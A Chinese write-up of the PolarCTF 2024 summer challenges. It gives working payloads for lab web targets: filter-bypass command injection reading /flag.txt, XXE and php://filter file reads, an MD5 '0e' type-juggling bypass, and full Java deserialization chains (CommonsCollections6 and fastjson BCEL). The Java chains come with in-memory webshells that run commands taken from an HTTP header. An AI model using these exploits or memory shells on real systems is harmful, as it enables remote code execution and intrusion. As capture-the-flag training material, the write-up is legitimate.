PolarCTF2024夏季个人挑战赛全wp

扫扫看

不用扫，猜测是flag.php

flag{094c9cc14068a7d18ccd0dd3606e532f}

debudao

flag在cookie里：

flag{72077a55w312584wb1aaa88888cd41af}

审计

<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

if (isset($_GET['xxs'])) {
    $input = $_GET['xxs'];

    if (is_array($input)) {
        die("错误：输入类型不允许为数组。");
    }
    if (!preg_match("/^0e[0-9]+$/", md5($input))) {
        die("错误：输入的MD5值必须以'0e'开头，并跟随数字。");
    }
    if (!is_numeric($input)) {
        die("错误：输入必须是数字。");
    }

    die("恭喜：".$flag);
} else {
    die("错误：必须设置正确参数。");
}
?> 

根据题意，我们需要输入纯数字进去，然后md5加密后是0e+数字的组合。

240610708的md5加密后是0e462097431906509019562988736854

所以输入xss=240610708即可

flag{1bc29b36f623ba82aaf6724fd3b16718}

upload1

是前端检测，抓包传

进入123.php post传参：123=system(“cat /flag.txt”);

flag{adbf5a778175ee757c34d0eba4e932bc}

Dragon

还是在cookie里，什么了色题？

flag{72077a551386b19fb1aea77814cd41af}

tnl

真傻逼，这题目输入3会报sql的错，但是这道题跟sql一点关系也没有，看wp才知道是普通的伪协议读文件他妈的真的

我说我怎么输，都会报twothree’的错草

源码：

<?php
error_reporting(0);
@$file = $_POST['twothree'];

if(isset($file))
{
	if( strpos( $file, "1" ) !==  false || strpos( $file, "2" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
	}
	else{
		echo "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'twothree'' at line 1";
	}
}

真傻逼

twothree=php://filter/convert.base64-encode/index/resource=flag

flag{29dba9019e40d75a5053b15f4f2906e1}

你知道sys还能这样玩吗

好家伙，开局403怼脸，来者不善，啥都没给，先猜，结果在sys.php有东西

 <?php
show_source(__FILE__);

if(isset($_POST['cmd'])){
    echo "<pre>";
    $cmd = $_POST['cmd'];
    if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
        $output = system($cmd);
        echo $output;
    }
    echo "</pre>";
}
?> 

就过滤了普通一些特定组合命令，这里因为直接执行系统命令，可以用bash的做法做，我这里使用变量拼接：

ls /
cmd=a=l;b=s;$a$b /;

看到根目录有flag.txt，但是这里把* ? .都过滤了，但是中括号还没有，可以用中括号的通配符：

cat /flag[^a]txt
cmd=a=ca;b=t;c=fla;d=g[^a]txt;$a$b /$c$d;

flag{196b0f14eba66e10fba74dbf9e99c22f}

法二：

利用php -r 执行php代码，编码绕过

cmd=php -r 'system(hex2bin("636174202f666c61672e747874"));'

不用双引号的版本：

cmd=php -r 'system(hex2bin(ff3b636174202f666c61672e747874));'

法三：

printf和双引号绕过base64加密

cmd=`printf "Y2F0IC9mbGFnLnR4dA=="|bas""e64 -d`

法四：

八进制转化

cmd=$%27\143\141\164%27%3c$%27\57\146\154\141\147\56\164\170\164%27

ExX

扫后台扫到了dom.php

报错有 DOMDocument::loadXML()

结合题目名字，猜测是xxe实体注入

直接上payload

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"> ]> <xml><name>&xxe;</name></xml>

PD9waHANCi8vZmxhZ3s3ZTk3ZThjNGY5ZDZiZTM1YWU4NTAwYjlmYjJjZGQzZX0NCg==

flag{7e97e8c4f9d6be35ae8500b9fb2cdd3e}

然后困难部分就全是java了=-=

CC链

cc6链，不出网打内存马，内存马下面给了。

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class main {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static byte[] serialize(final Object obj) throws Exception {
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(btout);
        objOut.writeObject(obj);
        return btout.toByteArray();
    }

    public static Object deserialize(final byte[] serialized) throws Exception {
        ByteArrayInputStream btin = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(btin);
        return objIn.readObject();
    }

    public static void main(String[] args) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz1 = pool.get(SpringEcho.class.getName());
        setFieldValue(obj, "_bytecodes", new byte[][]{clazz1.toBytecode()});
        setFieldValue(obj, "_name", "Infernity");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        Transformer transformer = new InvokerTransformer("getClass", null, null);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformer);
        TiedMapEntry tme = new TiedMapEntry(outerMap, obj);
        HashMap expMap = new HashMap();
        expMap.put(tme, "key");
        outerMap.remove(obj);
        setFieldValue(transformer, "iMethodName", "newTransformer");
        byte[] obs = serialize(expMap);
        System.out.println(new String(Base64.getEncoder().encode(obs)));
        deserialize(obs);
    }
}

ezJson

fastjson-1.2.83原生反序列化。ysoserial有现成的exp。

只需要准备好回显内存马就行

具体怎么构造的链子，可以看https://www.bilibili.com/video/BV1Ds421g7pw/?vd_source=cd1ee3d9c8c623012da5b159695424ee&p=11&spm_id_from=333.788.videopod.sections

shell.class：

package com.Memshell.fastjson1_nei_chun_ma;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class shell extends AbstractTranslet {
    public shell() {
        try {
            org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
            javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
            javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
            String[] cmd =  new String[]{"sh", "-c", httprequest.getHeader("Infernity")};  //请求头加一个Infernity后面加命令
            byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
            httpresponse.getWriter().write(new String(result));
            httpresponse.getWriter().flush();
            httpresponse.getWriter().close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws
            TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) throws TransletException {
    }
}

FastJsonBCEL

https://cloud.tencent.com/developer/article/2335078

在/parse路由下存在FastJson解析可能存在反序列化漏洞。

查看pom.xml

注意到存在tomcat-dbcp依赖和fastjson依赖，且版本分别为9.0.8、 1.2.24。所以可以使用FastJson借助tomcat-dbcp实现BCEL字节码加载的方式。

import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.Utils.Util;

public class test {
    public static void main(String[] args) throws Exception{
        byte[] bytes = Util.file2ByteArray("C:\\Users\\13664\\Documents\\JavaUtils\\target\\classes\\com\\Memshell\\fastjsonBCEL\\shell.class");
        String code = Utility.encode(bytes,true);
        String s = "{{\"x\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\":{ \"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"$$BCEL$$"+code+"\"}}:\"x\"}";
        System.out.println(s);
    }
}

shell.class：

import java.lang.reflect.Method;
import java.util.Scanner;

public class shell {
    static {
        try {
            Class v0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
            Method v1 = v0.getMethod("getRequestAttributes");
            Object v2 = v1.invoke(null);
            v0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
            v1 = v0.getMethod("getResponse");
            Method v3 = v0.getMethod("getRequest");
            Object v4 = v1.invoke(v2);
            Object v5 = v3.invoke(v2);
            Method v6 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
            Method v7 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
            v7.setAccessible(true);
            v6.setAccessible(true);
            Object v8 = v6.invoke(v4);
            String v9 = (String) v7.invoke(v5,"Infernity");      //请求头传参
            String[] v10 = new String[3];
            if (System.getProperty("os.name").toUpperCase().contains("WIN")){
                v10[0] = "cmd";
                v10[1] = "/c";
            }else {
                v10[0] = "/bin/sh";
                v10[1] = "-c";
            }
            v10[2] = v9;
            v8.getClass().getDeclaredMethod("println",String.class).invoke(v8,(new Scanner(Runtime.getRuntime().exec(v10).getInputStream())).useDelimiter("\\A").next());
            v8.getClass().getDeclaredMethod("flush").invoke(v8);
            v8.getClass().getDeclaredMethod("clone").invoke(v8);
        } catch (Exception var11) {
            var11.getStackTrace();
        }
    }
}